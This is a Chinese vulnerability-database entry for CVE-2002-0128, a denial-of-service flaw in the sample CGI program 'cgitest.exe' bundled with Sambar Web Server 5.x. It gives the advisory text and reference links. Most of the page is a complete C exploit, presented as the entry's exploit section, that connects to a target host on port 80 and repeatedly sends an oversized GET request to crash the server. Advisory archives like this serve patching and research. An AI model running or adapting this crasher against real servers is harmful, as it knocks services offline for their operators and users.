Sambar Web服务器例子程序拒绝服务攻击漏洞

Sambar Web服务器例子程序拒绝服务攻击漏洞

漏洞ID 1106603 漏洞类型 未知
发布时间 2002-02-06 更新时间 2005-05-02
图片[1]-Sambar Web服务器例子程序拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2002-0128
图片[2]-Sambar Web服务器例子程序拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200203-086
漏洞平台 Windows CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21228
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200203-086
|漏洞详情
SambarServer是一个多线程的Web服务器,运行于Windows9x/ME/NT/2000平台下。与SambarServer捆绑在一起的范例程序存在问题,远程攻击者可以利用这个漏洞对服务器程序进行拒绝服务攻击。SambarServer下有一个范例程序”/cgi-win/cgitest.exe”,通过向此程序连续多次发送带超长参数的请求会导致服务器程序崩溃。利用这个漏洞也有可能在主机上执行任意指令。虽然漏洞是在5.1版的程序中发现的,其他版本也有可能受此影响。
|漏洞EXP
source: http://www.securityfocus.com/bid/3885/info

Sambar Server is a multi-threaded web server which will run on Microsoft Windows 9x/ME/NT/2000 operating systems.

It is possible to cause a denial of service to Sambar Server by sending consecutive excessively long requests to the 'cgitest.exe' sample script.

The possibility exists that this issue may be the result of improper bounds checking. As a result, this vulnerability may potentially be used to execute arbitrary code on the host running the vulnerable software. Though this has not been confirmed.

While this issue was reported for Sambar Server 5.1, other versions may also be affected.

/*********************************************************************
**********
**
**               06.02.2002 - GREETZ TO WbC-BoArD & YAST CREW

**
**               Compiled with gcc under linux with kernel 2.4.17

**
**               Programname: Sambar Server 5.0  Manufacturer:Jalyn

**
**********************************************************************
*********/

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

#define SERVER_PORT 80
#define MAX_MSG 100

  int sd, rc, i,j;
  char buf[5000];
  char msgtosnd[5024];
  char msgtoget[102400];
  char source[200000];
  struct sockaddr_in localAddr, servAddr;
  struct hostent *h;
  FILE *f1;

int main (int argc, char *argv[]) {
printf("Sleepy of Yast presents "Sambar Server Production 5.0
Crasher"n");
if(argc != 2)
{
printf(">>> usage: %s <ip>",argv[0]);exit(0);
};
h = gethostbyname(argv[1]);
if(h==NULL)
{
printf("%s: unknown host '%s'n",argv[0],argv[1]);
exit(1);
}
servAddr.sin_family = h->h_addrtype;
memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0],
h->h_length);
servAddr.sin_port = htons(SERVER_PORT);
sd = socket(AF_INET, SOCK_STREAM, 0);
if(sd<0)
{
perror("cannot open socket ");
exit(1);
}

localAddr.sin_family = AF_INET;
localAddr.sin_addr.s_addr = htonl(INADDR_ANY);
localAddr.sin_port = htons(0);
rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr));

if(rc<0)
{
printf("%s: cannot bind port TCP %un",argv[0],SERVER_PORT);
perror("error ");
exit(1);
}
rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr));
if(rc<0)
{
perror("cannot connect ");
exit(1);
};
strcpy(buf,"A");
fprintf(stderr,"Entering Loopn");
for(i=1;i<4000;i++)
{
strcat(buf,"A");
}
sprintf(msgtosnd,"GET /cgi-win/cgitest.exe?%s HTTP/1.1nhost:
localhostnnn",buf);
for(j=0;j<5;j++)
{
send(sd,msgtosnd,5024,0);
}
printf("nn BOOOOM");
}
|参考资料

来源:BID
名称:3885
链接:http://www.securityfocus.com/bid/3885
来源:BUGTRAQ
名称:20020116SambarWebserverv5.1DoSVulnerability
链接:http://www.securityfocus.com/archive/1/250545
来源:www.sambar.com
链接:http://www.sambar.com/security.htm
来源:XF
名称:sambar-cgitest-dos(7894)
链接:http://www.iss.net/security_center/static/7894.php
来源:BUGTRAQ
名称:20020206SambarWebserverSampleScriptv5.1DoSVulnerabilityExploit
链接:http://www.der-keiler.de/Mailing-Lists/securityfocus/bugtraq/2002-02/0083.html

相关推荐: Solaris ifconfig ioctls Vulnerability

Solaris ifconfig ioctls Vulnerability 漏洞ID 1105030 漏洞类型 Unknown 发布时间 1997-08-25 更新时间 1997-08-25 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享